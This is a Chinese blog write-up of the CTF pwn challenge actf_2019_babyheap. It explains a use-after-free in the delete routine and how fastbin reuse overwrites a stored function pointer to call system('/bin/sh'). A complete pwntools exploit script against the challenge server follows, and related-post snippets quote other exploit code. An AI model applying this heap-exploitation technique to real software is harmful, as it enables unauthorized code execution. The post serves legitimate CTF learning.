actf_2019_babyheap【write up】

最新推荐文章于 2023-06-18 19:18:34 发布
最新推荐文章于 2023-06-18 19:18:34 发布
阅读量127 收藏 1
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/130063527
版权

actf_2019_babyheap

惯例我们先来checksec一下

除了PIE外保护全开的64位程序

由于开启了 Full RELRO因此我们对于got表只有read权限

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zX5wqzwa-1681115412160)(D:\desktop\pwn\笔记\wp\4.9\1681033218686.png)]

放进ida64里看看 去除了符号表 但因为是一道比较标准的菜单题 所以相对来说还是比较轻松的

main函数

标准的菜单题 1添加堆 2删除堆 3 打印堆

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-G9jtPIPF-1681115412161)(1681033652222.png)]

add

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QJJH5D3J-1681115412161)(1681113503455.png)]

show

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3VxfRaUU-1681115412162)(1681113537270.png)]

delete

没有将指针置零 因此存在uaf漏洞

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DPHGR1YR-1681115412162)(1681113553204.png)]

审题完成 开始解题

由于delete函数中存在明显的uaf漏洞 同时add函数中又是先申请一个大小为0x10的chunk 然后再申请大小为size的chunk 且show函数是通过执行大小为0x10的chunk的后八位存储的函数来打印chunk中的内容的 于是我们可以利用fastbin的性质来达成篡改大小为0x10大小的chunk的后八位进而达成执行system('/bin/sh)'

首先我们先申请两个chunk

然后将这两个chunk free掉 这样我们大小为0x10的fastbin就有两个了 此时再申请一个大小为0x10大小的chunk即可

add(0x80,'aaaa')
add(0x80,'bbbb')
delete(0)
delete(1)
add(0x10,p64(bin_sh)+p64(system))
show(0)

然后我们就可以获得到控制权啦

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rooUmBDJ-1681115412162)(1681115393323.png)]

exp

from pwn import *
io=remote('node4.buuoj.cn',29126)
elf=ELF('./ACTF_2019_babyheap')
bin_sh=0x602010
system=elf.plt['system']
context.log_level='debug'
#io=process('./ACTF_2019_babyheap')
def add(size,content):
	io.recvuntil('choice: ')
	io.sendline('1')
	io.recvuntil('size: ')
	io.sendline(str(size))
	io.recvuntil('content: ')
	io.send(content)
	
def delete(idx):
	io.recvuntil('choice: ')
	io.sendline('2')
	io.recvuntil('index: ')
	io.send(str(idx))
	
def show(idx):
	io.recvuntil('choice:')
	io.sendline('3')
	io.recvuntil('index:')
	io.send(str(idx))
	
add(0x80,b'aaaa')
add(0x80,b'bbbb')
delete(0)
delete(1)
add(0x10,p64(bin_sh)+p64(system))
show(0)
io.interactive()
爱若 AI_ruo
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
actf_2019_babyheap
qq_53062301的博客
08-22 274
和之前一道堆题目比较像也是一道uaf题目,题目也是一道经典菜单题目,也是具有create,delete,printf,exit四个功能,create函数中会申请两个chunk,其中一个大小为0x10,另一个大小供用户输入,0x10的大小chunk中保存了一个指向输入处的指针,还保存了一个函数指针,printf函数中调用了这个指针,delete函数中没有将指针置空,存在uaf漏洞,大致思路就是申请两个大于0x10的chunk,然后释放,再申请一个0x10大小的chunk,系统就会把之前两个0x10大小的chu
BUUCTF pwn——ACTF_2019_babyheap
CNS-Enterprise BCC-1701-J
03-09 206
BUUCTF 做题练习
actf_2019_babyheap(uaf)
m0_51251108的博客
11-05 272
actf_2019_babyheap: 一般有时间的就有system 逆向分析:
BUUCTF-----actf_2019_babyheap (UAF)
半岛铁盒的博客
06-15 6197
这道题和之前做的 hitcontraining_uaf 这道题类似 64位程序,没开PIE 并且这里发现了 bin/sh 字符串
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
MATLAB(Matrix Laboratory)是一种强大的数学计算软件,广泛应用于工程计算、数据分析、算法开发和图形化界面构建等领域。本资源“matlab的90个实例.rar”提供了MATLAB的基础知识,通过90个实例帮助初学者掌握其...
光立方888 573 2803程序
06-14
光立方是一种创新的LED显示技术,它通过三维立体排列的LED灯珠,形成一个透明、可编程的灯光展示装置。这种技术广泛应用于艺术展览、舞台效果、广告展示等领域,因其独特的视觉效果和高度的可定制性而备受青睐。...
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
Jeopardy-Writeups:SniperOJ的CTF挑战比赛
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
[BUUCTF]PWN——actf_2019_babyheap(UAF)
mcmuyanga的博客
04-09 774
actf_2019_babyheap 例行检查,64位程序,没开PIE 检索字符串的时候发现了’/bin/sh’字符串 程序在申请malloc的时候定义了这样一个结构体 菜单里调用了system,这下system地址有了 add() 申请两个chunk看一下,方便理解 delete() show() 利用思路: 将ptr[i][1]处原先的print_content函数改成system,ptr[v1]改写成bin/sh的地址,这样在执行show的时候就会执行system(‘/bin/sh
actf_2019_babyheap题解析
qq_29317353的博客
06-18 262
再次创建一个0x10大小的堆块,会从fastbin里面拿出一个0x10大小的堆块就是index3会覆盖掉index0的地址根据malloc的分配机制,所以把函数的指针改为system把content的指针改成/bin/sh就完成了UAF漏洞利用的一个过程。struct chunk是0x10的堆结构体,content chunk是用来存放数据的。查看printf_out,发现利用点。思路创键3给堆块,大小相同,防止合并。由于是UAF漏洞先看,free。看看分配堆块的地方,看注释。mian函数分析,见注释。
[BUUCTF]PWN——actf_2019_babystack
mcmuyanga的博客
01-19 1345
actf_2019_babystack 附件 步骤: 例行检查,64位程序,开启了nx保护 本地运行一下看看大概的情况,有两次输入 64位ida载入 程序可以输入两次,加上只能覆盖ebp和返回地址,想到的是栈迁移的方法 栈迁移主要就是使用的leave和retn这两条指令,两条指令的实质是 leave:move rbp,rsp;pop rbp retn:pop rdi 利用思路 第一个输入点固定输入0xe0,造成溢出 19行会打印出s在栈上的地址,接收一下,获得栈地址 由于没有现成的system
BUUCTF pwn 五月刷题
coco的博客
05-04 671
actf_2019_babystack 典型的stack pivot,告诉了输入时候栈的地址,我们可以通过伪造ebp,通过两次leave将esp指向开始时候的栈地址。注意的是这里system("/bin/sh")有问题,换了one gadget才成功,不是很清楚为什么。 from pwn import * context.log_level = "debug" context.terminal ...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 1977
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
BUUCTF pwn wp 111 - 115
fa1c4的blog
03-03 365
judgement_mna_2016 actf_2019_babyheap gyctf_2020_signin wdb_2018_3rd_soEasy gyctf_2020_some_thing_interesting
BUUCTF-pwn(14)
njh18790816639的博客
01-23 3493
gwctf_2019_jiandan_pwn1 简单ret2libc,唯一需要注意的便是注意修改索引值,防止索引被覆盖!从而无法进行栈溢出! from pwn import * from LibcSearcher import LibcSearcher context(os='linux',arch='amd64',log_level='debug') binary = './pwn' r = remote('node4.buuoj.cn',25586) #r = process(binary) elf
持续更新 BUUCTF——PWN(三)
weixin_41748164的博客
03-04 854
这只是个人笔记,buuctf的刷题的第三篇,欢迎一起讨论重新搭建一个合适pwn环境:https://blog.csdn.net/weixin_41748164/article/details/127874334buuctf的前两页:https://blog.csdn.net/weixin_41748164/article/details/126325515。
buuoj Pwn writeup 141-145
yongbaoii的博客
05-28 218
141 jarvisoj_level6_x64 保护 142 suctf_2018_stack 保护 直接栈溢出到system就行。要注意ubuntu18,有个栈对齐。 from pwn import * r = remote('node3.buuoj.cn',28430) leave_ret = 0x400732 pop_rdi_ret = 0x4007a3 ret_addr = 0x0400677 payload = 'a' * (0x20 + 8) + p64(ret_addr) r.send
ACTF gogogo
最新发布
09-06
ACTF是指Attack and Defense CTF,是一种网络安全竞赛形式。在ACTF比赛中,参赛队伍需要在规定的时间内攻击对手的系统并保护自己的系统免受攻击。参赛队伍需要在攻防过程中发现漏洞、修补漏洞、攻击对手并保护自己的系统。通过比赛,参赛者可以提高对网络安全的理解和技能,并增强团队合作和问题解决能力。ACTF比赛旨在培养网络安全人才,并促进网络安全技术的发展。如果你对CTF比赛和网络安全感兴趣,可以考虑加入安全团队,如EDI安全,他们提供了一个良好的学习氛围和丰富的经验,可以帮助你在CTF比赛中取得进步。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【2022 ACTF-wp】](https://blog.csdn.net/qq_45603443/article/details/125498747)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值